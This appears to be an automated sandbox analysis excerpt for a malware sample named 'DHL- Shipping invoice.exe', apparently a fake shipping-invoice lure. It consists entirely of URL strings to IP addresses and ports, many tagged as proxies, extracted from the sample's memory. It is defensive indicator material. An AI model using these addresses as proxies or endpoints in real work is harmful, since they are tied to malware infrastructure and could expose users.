                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.221.182
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.221.182.14:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.221.182.14:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.88:20317
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.88:20317://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9802FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.88:29313
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9802FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.88:29313://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.88:45883
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.88:45883://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.88:8595://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.129.254:27045
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.129.254:27045://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.129.254:9553
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.129.254:9553://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.154.97:59369
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.154.97:59369://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.16.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.16.169:11320
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.16.169:11320://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.16.169:27399
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.16.169:27399://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.16.169:27718
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.16.169:27718://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.16.169:41824
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.16.169:41824://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.16.169:55610
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.16.169:55610://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.167.243:40961
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.167.243:40961://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.167.243:48298
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.167.243:48298://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980ABE000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9803EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.167.243:49612
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980403000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.167.243:49612://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.112:58674
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.112:58674://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.169:38117
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.169:38117://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.247
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.247:60349
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.247:60349://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.247:7183
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.247:7183://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.82.125:45605
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.82.125:45605://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://133.232.90.96
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://133.232.90.96://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://133.232.90.96:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.122.26.44:46116
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.122.26.44:46116://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.19.254.2:21231
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.19.254.2:21231://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.19.254.2:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.19.254.2:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.195.91.76:27432
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.195.91.76:27432://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.195.91.76:27432p
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98347B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.209.189.42
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98344F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.209.189.42://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98344F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.209.189.42:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980BEE000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.209.29.120:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980C93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.209.29.120:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.125.225.75:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.125.225.75:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.148.10.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.148.10.161:3970
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.148.10.161:3970://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.148.10.161:5607
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.181.102.118:7117
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.181.102.118:7117://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980AB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.181.79.170:22679://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981E82000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9822A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://136.143.144.187:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9822A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://136.143.144.187:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://136.239.176
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://136.239.176.66:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://136.239.176.66:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://136.244.99.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://136.244.99.51:8888
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://136.244.99.51:8888://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.142.37:443
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.15.145:8000
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.15.145:8000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.197.190
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.197.190://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.197.190:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.59.50.39:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.59.50.39:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.59.50.41:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.59.50.41:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.0.207.18:38328
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.0.207.18:38328://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.117.179.54:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.117.179.54:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.118.200
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.118.200.49:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.118.200.49:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.197.148.215
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.197.148.215://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.197.148.215:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9834C7000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.2.73.157:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9834A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.2.73.157:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.201.21.218:65032
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.201.21.218:65032://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.59.151.162:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.59.151.162:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.59.235.249:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.59.235.249:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.68.60.8:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.68.60.8:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.0.6.11:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.0.6.11:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.129.162.65:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.129.162.65:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983ABD000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.144.20.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983ABD000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.144.20.92:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.144.20.92:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.162.224.37:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.162.224.37:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.162.238.184
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.162.238.184:18177
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.162.238.184:18177://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.162.238.184:21017
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.162.238.184:29870
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.162.238.184:29870://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.162.238.184:39652
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.162.238.184:39652://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.162.238.184:4837
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.162.238.184:4837://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980A8C000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981534000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.198.112.223:17620
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98154F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.198.112.223:17620://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.255.94.122:39635
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.59.66.145:41458
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.59.66.145:41458://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.60.183.10:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.60.183.10:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.148.90:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.103.24.20:8000
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.103.24.20:8000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.207.117.32:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.207.117.32:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.207.118.211:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.207.118.211:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.207.206.27:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.207.206.27:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.207.24.176:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.207.24.176:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.207.41.71:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.207.41.71:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.232.163.52:10801
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.232.163.52:10801://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.248.94.1
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.248.94.123:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.248.94.123:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.56.98.15:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.56.98.15:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.97.32.152
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.227.204.70:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.227.204.70:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.227.228.202:10101
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.227.228.202:10101://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.227.61.156:23456
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.227.61.156:23456://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.136.42.164
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.136.42.164://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.136.42.164:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.147.9.254://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.147.9.254:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.95.160.178:10709
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.95.160.178:10709://proxy
